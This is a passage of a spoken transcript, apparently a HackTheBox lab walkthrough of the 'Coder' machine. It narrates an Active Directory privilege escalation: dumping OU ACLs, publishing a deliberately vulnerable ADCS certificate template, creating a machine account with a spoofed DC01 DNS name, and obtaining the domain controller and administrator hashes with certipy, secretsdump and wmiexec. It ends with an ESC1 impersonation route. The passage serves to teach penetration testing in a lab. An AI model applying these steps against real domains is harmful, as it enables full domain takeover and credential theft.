you a group with no members. And then it's also looking at where the object SID ends in 512, which is, I think, the local administrator one, right? This is going to be the domain SID, so that's why it's a wildcard. So that's how that query works. We're going to kind of change it up. And the best place, I think, to learn the cipher syntax is the HackTheBox Academy course. I know it's one of the higher tiers. A lot of people are like, why is Bloodhound tool so simple? Costs more money than most of the training on Academy. The answer is because it teaches some pretty in-depth stuff. Bloodhound is really powerful. People just generally don't use like the custom syntax features like we're about to show. So we're going to say, or custom cipher queries, I should say. We're going to match the OU, and we're going to make sure it contains nothing, because we don't care if there's nothing underneath this OU. It's not like a group where it always has items. If it doesn't have items, it doesn't matter. We're not showing what's underneath OU, right? Because forget what I'm saying. Like the OU could contain other things. Like you put groups in OUs, users in OUs, right? We're just looking at OU right now. So we'll do that. Return like that. So this is going to be the cipher query. So let's cat this, grab it, go over here. And now we have it. How do I hide this? There we go. So we see all 5 OUs. So 1, 2, 3, 4, 5. The reason why we don't have like these two linked is these are both under the parent, right? There's the domain right here, which is technically not an OU. That would link both of those. I forget exactly what that's called. But we can see domain controllers has one child. That is going to be DC01. And that is a computer object. We have development. build agents, users, groups, and like the groups has software developer, build agent management. There's also this OU that has nothing in it. We want to see exactly what the purpose of this OU is. And unfortunately, we can't do it from Bloodhound. This is where we go into the WinRM component, right? So let's go over to WinRM. Let's see, that was the Bloodhound. Nope. I forget exactly where I was logged in. I could swear I left myself logged in. That is right here. Awesome. So let's call this WinRM. And now we can run a Get-ACL command and then specify the OU we want. So I want to do this OU. So let's grab this. Okay. And if I do this command, we have path owner access. It doesn't format well on my screen, but if we put this all in parentheses, we can dump access. And this is going to show everything, right? And the identity reference is who can access it. So what we want to do there now is do a pipe and say where identity reference is equal to the group, right? So we want to do coder, which is the domain, /, let's see, what group do we want? We can do software developers. So software developers. Maybe I have to put this in caps. Or it's possible software developers doesn't have any rights over this OU. So let's try the next one. Build agent build agent MGMT. And that has nothing. Is that case sensitive? Let's do all caps. Build agent like that. Let's see. I think that was supposed to return something. So we do have identity reference here. So we have an error in our command. And let's see, what did we do wrong? Let's just paste it exactly as it was. So coder, and then I guess that's camel case. I probably mistyped this. There we go. So it's not case sensitive. You just have to put the casing correct or the spelling correct. We go back to software developers and fix that typo. We get nothing. So what this is showing is we have two permissions to this as build agent management. The first one is this object type. And if we search what this object type is, I think that's going to be computers. So let's just Google that. Go to the computer class on the Microsoft Learn, and it's going to give us the schema ID. And we see that is computer. So we can create computers in this OU is what this is saying. We also have this one. If we look at it, let's go back, search this UID. This is validate DNS name. So we can probably read and write DNS properties in here. So this allows us to just create computers, and we can also edit their DNS name when we create them, which I guess we would need to do if we create a computer because the computers need to have DNS. The only problem is our current user doesn't have, isn't in this group, right? This is the, do we have notes here? Right here. We're e.blake, we have PKI admin. s.blade is a software developer and is a member of this group. So what we could do here is from e.blake, we can create a certificate that will, or enrollment policy, I guess I should say, that will be vulnerable to allowing spoofing of DNS names. And I don't think this is, I think this is the harder way to go about it. After thinking about this, I'm pretty sure there's easier ways to do it, and I may explore that in the end of the video if I have time. But what we're going to do is create an enrollment policy that allows machines with, I'm going to call it a spoof DNS name, which isn't exactly correct, become DC. And then as s.blade, we'll create the malicious machine object, and then we will, as the malicious machine and enroll machine, I should say. Well, create malicious machine object is enrolling it. Create computer. We will do certify to go to DC. So that's going to be the attack path. Again, I think we're overcomplicating it a little bit here. Maybe we'll get simpler, but I really did like showing how to dump OUs, showing the ACLs and doing all those type of things, because that is useful, right? It is cool that the default machine account creation policy or quota is 0, but we can still create machines because we had an explicit right on this OU right here. So even though I think we're overcomplicating here, that's why I still wanted to show it this way. So let's see. We have to now create the enrollment policy. But before we do that, let's go to Google because I want to pull up an article that is really good for talking about this. So let's search Certifried. And then we'll go to this article. I'm not going to read everything. This is a patch thing, but the way it was patched does allow it for still configuring it to be vulnerable, which is why we're going to abuse this, right? This whole post is good. Essentially, when you create a certificate for a machine, you can have a duplicate name because in machine accounts, you don't have a UPN. That's a user principal name. That's the unique constraint there. User accounts, they all require that, so you can't like duplicate users. But for the machine, we can. So if we create a machine object, give it the DNS name of DC01, we can request a certificate in a way that when it authenticates, it says we are DC01, and that will give us the privilege to do like a DC sync and things. So scrolling down, I do want to go to talk about this. Let's see. Where is it? There we go. On this patch. So the flag, it says it was patched, but it's been done in a way, let's see. So essentially, if msPKI-Enrollment-Flag is equal to the CT flag no restriction extension ID, which is 0x80,000 in hex, then it will be vulnerable. It says it is unlikely this flag is ever sent, but you should be aware for the implication. So this is just one thing that because we're a PKI admin, we can set the flag, or we can create a new certificate setting the flag, which will let us exploit it. This is kind of like the allow reversible encryption and Active Directory for, I think it's ASRep roasting. I forget the exact name. Not ASRep roast. Whatever that one flag is, you rarely see it in production environments because no one checks that box, but attackers may, so then they can go query that password and crack it, right? So let's see. The first thing we will want to do is, I guess we can run certify first. Try to think of a good path. So I think we're going to run certify, show it says it's not vulnerable, run it again after we create the malicious cert, and we see it is. I think that sounds fun. So we'll do certify find-u e.black at coder.htb, the password. Let's cat, we go up to directories, cat creds. We can grab this password. And then DC IP 10.10.11.207, vulnerable, standard out. And it's going to say there's no vulnerable as long as we haven't massively screwed up here, right? So we look and could not find any certificate templates that are vulnerable. So what we want to do is create one. So we can go and get something to export it. or not export. Let's see. Let me just ADCS Template, GitHub. Go to this repo, the goT ADCS repo. Go enter a www directory. Then we want to run a git clone. And then let's cp ADCS template up one directory. Okay, so now we want to download these two things to the box. So we go back to a WinRM. Let's make dir ADCS. Now we can curl 10, 10, 14, 8, 8000. What were those file names? PSD1 and PSM1. -o. There we go. Then PSM1. And let's grab the curl. Okay. So now we want to do a import module and then specify this. It's important you do the /. If you don't do /, then it won't find the file. So now that we have that, we have this function called Get-ACS Template. And if we looked at this page, it would say how to use it, right? All we want to look at is the display name. So I'm going to clone the computer one. So we're going to say von template is equal to export ADCS template - display name computer. So if now I do von template, we have all the settings, right? And in the post, what was it? Let's see, do we still have certified up? We want this enrollment flag. So it's set to 32. So let's do a von template dot msPKI-Enrollment-Flag. Does that pull it? Well, let's put it in quotes because we do have dashes, and that is a dangerous character. I'm just going to copy it just to make sure we have it right. Okay, I thought it would display it, but maybe it doesn't. We'll just set it to 0x. It was 80,000, right? There's 3 zeros there, and we still have 1. 3, and then 1. There we go. Cannot be found. What? I thought that's how we would set it. Maybe it's that. No. Let's see. We're doing something wrong. Maybe this isn't just an object yet. Let's see. Phone template. Let's do a convert from JSON. There we go. So we just had a straight JSON file. It didn't actually convert it to an object. So that's what we just did there. So now if I do, let's see, Certificate-Enrollment-Flag. There we go, 32. So now we can set it to that. So now we have a template. we have changed the enrollment flag. So now we want to import the template. So let's convert this to JSON. We don't want to convert just the variable. We want to convert everything. We can call this out.json. If we do type out.json, we have the configuration we want for a vulnerable template. So now let's load it. So vuln template is equal to convert. Oh, wait, we don't want to load it. We want to do a new ADCS template. And then display name, we'll call it vuln template. Then we say publish, and then specify the JSON file of, we'll do cat out.json -raw. So all that did is output the JSON file, right? So we've published the certificate. I want to see, and I'm not 100% positive, but I think Certify now will flag it wherever we ran that. There we go. So it's going to find them all. And there we go. We have a ESC4 template. It's owned by e.black. It actually says the name, not the account, but that template is owned by him. Now, in order to exploit this ESC4, we have to create the machine with a spoofed DNS name. So I'm going to pull the latest version of mPacket. So let's do mPacket GitHub. Okay. I'm going to do Python 3-m vm.venv source VM bin activate. So now I can install this. So let's clone mPacket pip install. And then we want to find the add computer script after it installs. So let's do cd examples, and we'll move add computer to add computer dc.py. Oh, I should have just copied it. My bad. There we go. And what we're doing is I just search for DNS. And what this is by default going to do is create the DNS host name of the computer host name, whatever computer host name we set it to. We want the computer host name to be different than the DNS. So I'm just going to get rid of computer host name, and we'll hard code it to DC01. So no matter what, we'll create this, and we'll get a DNS host name of DC01. So let's do add computer DC01, specify the domain, which was coder.hdb, the user that has permission to add computers, which was s.blade, get her password. So we can copy this, put it in here. And then let's do computer name, pwn PC, the computer pass, we'll do please sub. And if we hit enter, it's going to probably say machine account quota exceeded, right? So we need to specify the group. So we'll do computer-group, and this is going to be that OU. So let's go here. We can grab the OU that we have permission to add in, hit enter, and still debug. Let's see. That is not helpful. I think this may mean it's going through SMB. We want to change the method to LDAP probably. And before I do that, I want to get rid of this computer group so we see the error message, right? So if we change this, we get a error of constraint type. It's not machine quota, oddly enough. If we got rid of, or change where we just add the DCO1, we get machine and quote exceeded. So what I think is happening here is it's erroring before it actually tries to add the computer. And by that, I mean, we're adding to the top level OU, which a DNS entry of DCO1 already exists. So that's where we get the constraint error at, is what I'm guessing. But if we specify the OU, that won't happen. So let's add this computer group to an LDAP-S command. So we have method LDAP-S, computer group, we do this. And before I add it, let's do a get AD computer pwn PC. We see it does not exist. So we can run this. It added it. And now the computer exists. So let's make sure we have a template still. So get ADCS template, because we've spent some time. Select display name. Vuln template is not here. So we want to make that again real quick. So new ADCS template, display name, vuln template, publish, JSON, gc out.json, raw. Publish, not public. There we go. So now we have that template. If we do display name, we have it. So we want to do set ADCS template ACL, display name, the vuln template. This is the template we just made. And we want to allow the machine account to enroll. So we'll do coder, pwn, PC, $, and then dash enroll. So now this computer account can enroll a certificate. So let's go back to our M packet, and we want to run certipy now. So we'll do certipy -u, and I'm going to specify pwn PC $-p, please sub -ca. This is in the certipy output. If we just do this, it's almost always going to be like the domain. Let's see. Do we have certipy vulnerable? Yep, there it is. Let's see. Come on, give me the output. If we don't do this too fast, it's going to delete the certificates again. Let's see. The authority. Right here, certificate authorities, right? So that's where you get the CA from. And then after CA, we want to specify the template, vuln template, and then the target is going to be dco1.coder.htb. Unrecognized arguments. Oh, certipy request, right? We did something wrong. Certipy request pwn PC certipy. Let's see. Source request. Yeah. And then I thought we would give it username. Does it not like the $? What argument is bad? Certipy request. Oh, CA name. That's probably it. No. Let's see. I must have a weird version of like Certify running, because I literally just copied that down here. Net BIOS connection with the host timed out. pip3 install Certify. It is installed. Something weird is going on here. This must be like an ancient version of Certify installed. Let's see. Git clone. My computer just froze. I cannot click. I'm going to pause the video and figure this out. Oh, wait. I typed a Z. Yeah, something's wrong. I'm not sure if you can even hear me complaining. The CPU is spiked there. What the heck is going on? It was when I loaded this GitHub page. So I'm not sure what happened. I did a pkill Firefox and it seems to be fine. The downside is I lost the link. So let's add this again. Certify GitHub. Let's see, can I just copy the URL? I don't want to go to this page again. So let's add this. Git clone. There we go. So let's do a pip3 uninstall Certify. Yes, we will remove it. Let's go in here, pip3 install dot. And we will run this again. There we go. That looks better. We get a weird error. Let's see, do we still have the computer and everything? Let's do a get 80 computer pwn PC. We don't. That is annoying. So let's see, let's add the computer. Let's see, pwn PC, computer, LDAP-S, packet examples. Added the machine. So let's publish the certificate. Add the ACL to pwn PC. And now let's do that certify request again. We request, and we have got the certificate. So now we should be able to do certify auth pfx dco1.coder.pfx. It's going to get the TGT. It's thinking about it. Clock skew. So we can do sudo ntp date. And we fix the clock skew. And we've got the NTLM hash of the DC. So this should allow us to do a secret stump. So hold on, let's do vcreds dco1 like that. Okay. So let's see. Let's do a secret dump, then coder.htb/dc01, like that. And then we can say dash hashes. And let's see, error connection. We have to give it the target. DCIP dc01.coder.htb. Let's see. Let's do that. And then at coder.htb. There we go. So what was happening there? Let's just pause that output. I was just specifying this, thinking impact would be smart enough to go just to DC01, but of course it's not. So we have to do the at to specify where to DC sync to, right? And we have the administrator hash right here. So we could do, let's do ps_exec, I guess, -u administrator dash, I think h, like that. Then 10.10 11.207. Let's see, how do we do this? ps_exec.py dash hashes. There we go. It's going to upload, starting the service, and it's taking a while. I wonder if Defender has killed ps_exec. That is very possible. In that case, I normally use wmi_exec. I'm guessing we dropped the binary for ps_exec to execute, and then Defender deleted it, and that was all she wrote. Yep. So let's try wmi_exec real quick. SMB dialect. And if this doesn't work, we can probably use evil winrm, right? But we do who am I, and we are coder/administrator. So that is the box through the intended way. And now let's talk about the unintended way, right? So the intended way is we had to use both of these accounts, right? e.blake was the PKI admin, so he could modify ADCS templates, and s.blade was the person that could create a computer, and the build agent management was the place s.blade could create them. That's a lot of hoops to jump through, right? But since we can already create vulnerable templates, why do we have to bother with this? We could just go with an easier route of certificate abuse, right? So what I'm going to do is Google, let's just say new ADCS template ESC1. And I'm hoping to find one that actually uses new ADCS template, but there isn't one. I'm not sure how everyone like purposely makes these misconfigured now that like the defaults isn't vulnerable, but I digress. So this does give us some useful output. It's from Certify, right? And it tells us what we need to be ESC1. So if we went back and we do this Certify find command, I'm going to get rid of the vulnerable and standard out. We're just going to run it. And this is going to give us the similar output that Black Hills has, right? So let's look at the text, and then I'm going to search. Let's just do the user certificate. That's user signature. Let's just do straight out user, because we're going to be modifying these anyways. So what we need is to make sure it's enabled and client authentication is true. So that is set. Okay. Enrollment agent, any purpose, those next two are false. Okay. Enrollee supply subject, this needs to be true. It is currently false, so we have to flip this bit. Certificate-Name-Flag. Oh, wait. Enrollee supplies. Okay. Yeah. This is true. And then certificate-Name-Flag also needs enrollee supply subject. That is not here, so we will add that. Enrollment flag is set to none. We have a few things here, so we want to unset this. Extended key use, server. We probably want server and client, right? Let's see, is there one that does server authentication? Okay, whatever this one is. Template name, machine, display name, computer. Let's use the computer one because that does extended key usage. So similar things. So let's go back to this and let's do get ADCS templates or a template. There we go. Dash display name, computer. And let's see, we have everything. So we want this to be set to A. This is what we called invuln template before, right? We did export last time. I wonder if I could have just done get. I think I could. So this is even easier. I don't know why I used export before. I do a.name. That works. So we now have the computer cert. So the flag we need to change, we have enabled as true, right? So we can do a.enabled. Let's see. I wonder if I want to do export so we don't have like the CN and everything. Let's do that. Export ADCS template dash display name computer. We'll say A is equal to this. And then A is equal to convert from JSON A. Okay, there's less variables when I do it through export. So that's why I did it before, right? This has like everything. Export only does what's exportable. So that's good. So we want to make sure client authentication. And that was already set. Let's see. So I'm going to ignore these two because those are set. Enrollment and any poll purpose. Okay. Enrollee supplies subject. We want to set that to true. So what would be enrollee supplies subject here? I'm going to guess it's going to be enrollment flags because that's the only thing that has enroll in it. So let's just Google this. And let's see. So this is going to be a bit mask. It's set to 32, which would be 20. So it's set to auto enrollment. If we look at this, does this tell us? It just says false. Enrollment flag. There we go. Auto enrollment. So how this is working is it's just a bit mask. So 32, you'd convert it to hex. So this would be 128, 64, 32, 16, 8, 4, 2, 1. That's 2 sets of 4, right? Yes. So because this bit is set, that means this CT flag auto enrollment is set. We want to... That's not what I was thinking. Let's see. But that means that is set. How do I make enrollee supply subject? Because we want to set enrollment flag to none. So we still want to modify this, but that wasn't the modification I was looking for. So we can set that to none, which would be 0. Okay. And then let's see. I don't know how to do that one. So Certificate-Name-Flag. Here we go. Let's search this. Certificate-Name-Flag attribute. There we go. So the bit mask of 1 is enrollee supply subject. And right now we have a pretty large number. Does this tell us what it is? So we have 2-bit set. We have subject required DNS as CN and alt required DNS. I'm just going to unset both of these and set the one I want. So what we do is say A, this is equal to 1. I'm trying to think. Do I want to set this? Because if I set this to just change this to be a 5, then you would see we'd have these 2 permissions still and then 1 extra one. And let's try that. Just to show you how like bit masking works, right? So we just flip the very first bit, which is 1, so we know that's now going to be set. What else do we need from this? Required management approval and authorized signature. So let's see. We set that. Signature is 0. I think we may be good. Let's just do convert to JSON A, right? Yep. I'm going to call this out.json. And then we can say new ADCS template, display name, ESC1, publish, JSON, cat out.json raw. So now we've created that. And let's just make sure our user can enroll. So we'll do the ACL, display name, ESC1, type allow, identity is going to be coder, and then backslash e.black, which is our user, and then enroll. Okay, so let's run this again with vulnerable and see if it tells us it's vulnerable to ESC1. I'm not positive if it is. If it isn't, we will just export it again and look at the settings. Or let's do that anyways. It is vulnerable, so we know we can do ESC1. But I do want to look at the settings to show you how that changed, right? So we can do a less on this. Our name was ESC1. And remember, I just added the enrollee supply subject here, so you can still see the other 2 are there, and that is set, right? Let's see. Require 0. So I think we should be good. So let's do certify. So we can do certify, then request. After request, it was u, coder, HTTP, e.black, the password of this, CA, coder, DC01, CA, template, ESC1, target, DC01.coder.htb. So it's going to request, and it did not like that. I get this error on and off. I don't know exactly what it is. I wonder if this user just can't request. So what I'm going to do is add a name server to be 10.10.11.207. We probably should say search. What is it? Coder.htb. Does this work better now? No. If we give it a bad password, we still get that error. Does debug tell us anything? Of course it doesn't. I haven't actually done the unintended way, so I don't know if something's broken on the box or my library. Cat creds. e.black. That is the password. The requested certificate is not supported. So does that mean the thing reset on me? Let's do that. Do this again. It's taking longer. NetBIOS timed out. There we go. We finally have it. So we saved a certificate key to e.black.pfx. If we do certify auth-pfx, certify, couldn't find identification. I think that's because we forgot to do one thing. When we request this, we also have to specify the user we want to impersonate. So let's do administrator at Encrypter.htb. Okay, so now we save the certificate to administrator.pfx. So if we do this, principal name, trying to get TGT, clock skew, sudo ntp date. I don't know why the clock keeps going off. I guess my VMware is like setting my computer clock back to a time and this is syncing. It's just conflicting, right? So we do this and we have the hash for administrator. So this was a way to do it without having to jump through the hoop of using two different accounts, creating a machine account. Hopefully this is a lot easier, right? If you had trouble with remembering to use UPN, I mean, I'm sure the Black Hills post does say it does. When we do a request, we're now impersonating a user, right? Before, I want to say we exploited, was it ESC4? It was either ESC4 or ESC6. So that's why we didn't have to specify the UPN, because we were writing on the DNS attribute of the computer object we created. This, we're not creating a computer object. We're just enabling us to specify the user principal name in the certificate we're requesting. So we're just requesting a certificate and we say, hey, we're allowed to say we're administrator in the certificate, give it to us, and it does. So yeah, that is going to be the box. I guess I should just do my due diligence and say, let's do a WMI exec. Shoot. Let's grab this. And then WMI exec. We can do WinRM. This will be easier. So netexec, SMB, username, administrator. Then we'll do, I think it's -H for the hash. I don't think I specify the hash that, maybe I do. Let's see. There we go, pwned. So you can see we definitely have the NTLM for administrator. So take care, guys. Hope you enjoyed it, and I'll see you all next time.